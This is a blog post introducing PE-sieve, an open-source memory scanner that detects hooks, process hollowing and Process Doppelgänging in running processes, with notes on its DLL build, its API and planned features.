PE-sieve is available in two versions – as a standalone executable and as a DLL. The DLL version became the base of my other project, HollowsHunter, which performs an automated scan of all the running processes. More about it later in this post.

Where to get it?

The tool is open-source, available on my GitHub:

  https://github.com/hasherezade/pe-sieve

Usage

It has a simple command-line interface. When run without parameters, it displays info about the version and the required arguments:

When you run it with the PID of a running process, it scans all the PE modules in its memory (the main executable, but also all the loaded DLLs). At the end, you can see a summary of how many anomalies of which type have been detected.

If some modified modules have been detected, they are dumped to a folder named after the given process, for example:

Short history & features

Detecting inline hooks and patches

I started creating it for the purpose of searching and examining inline hooks. You can see it in action here (old version):

It not only detects that there IS an anomaly/patch, but also WHERE exactly it is. For each dumped PE where patches were found, it creates a file with tags that can be loaded by PE-bear.

Thanks to this, we can easily browse the found hooks and check the code that was overwritten.

For example – in the application presented above, the Entry Point was patched and the execution was redirected to the added, malicious section:

Detecting hollowed processes

Later, I extended it to detect process hollowing etc. – and it turned out to be a pretty convenient unpacker:

Detecting Process Doppelgänging

In a similar manner, it can detect some other methods of impersonating a process, for example Process Doppelgänging. The malicious payload is directly dumped and ready to be analyzed:

Recovering erased imports

PE-sieve has the ability to recover erased imports. To enable it, run it with the appropriate option. Example – unpacking manually loaded payloads with erased imports (Emotet):

Future development

The project is still not finished and I have many ideas for how to make it better. I am planning to detect not only code modifications, but also other types of hooking, such as IAT and EAT patching.

Some in-memory patches are made by legitimate applications, so in a future version I will provide the capability of whitelisting defined patches.

I am also planning to extend its dumping capabilities against malicious processes that try to defend themselves against dumpers, etc.

PE-sieve as a DLL

During the development process I got the idea to make a DLL version of PE-sieve, so that it can be incorporated into other projects.

Building PE-sieve from sources as a DLL is very easy – you just need to set one CMake option: PE_SIEVE_AS_DLL:

build_as_dll

The PE-sieve DLL exposes a minimalistic API. Two functions are exported:

pe-sieve_func

  1. PESieve_help – displays short info and the version of the DLL.
  2. PESieve_scan – performs a typical scan with the given parameters, like PE-sieve.exe

The necessary headers need to be included from the folder “pe-sieve\include“:

https://github.com/hasherezade/pe-sieve/tree/master/include
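For orientation only, this is roughly what consuming the DLL dynamically could look like. The authoritative prototypes are in the headers linked above; the void(void), __stdcall signature assumed here for PESieve_help is my assumption, not taken from the project documentation:

#include <windows.h>
#include <stdio.h>

// Assumed prototype; check pe-sieve\include for the real one.
typedef void (__stdcall *PESieve_help_t)(void);

int main(void)
{
    HMODULE hLib = LoadLibraryA("pe-sieve.dll");
    if (!hLib) {
        printf("pe-sieve.dll not found\n");
        return 1;
    }
    PESieve_help_t pHelp = (PESieve_help_t)GetProcAddress(hLib, "PESieve_help");
    if (pHelp)
        pHelp();   // prints the short info and version, per the description above
    FreeLibrary(hLib);
    return 0;
}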

I have plans to enrich the API in the future. For now, you can see the PE-sieve DLL in action in the HollowsHunter project.

Ideas? Bugs?

If you notice a bug or have an idea for a useful feature, don’t hesitate to mail me or create a GitHub issue – I check them regularly:

https://github.com/hasherezade/pe-sieve/issues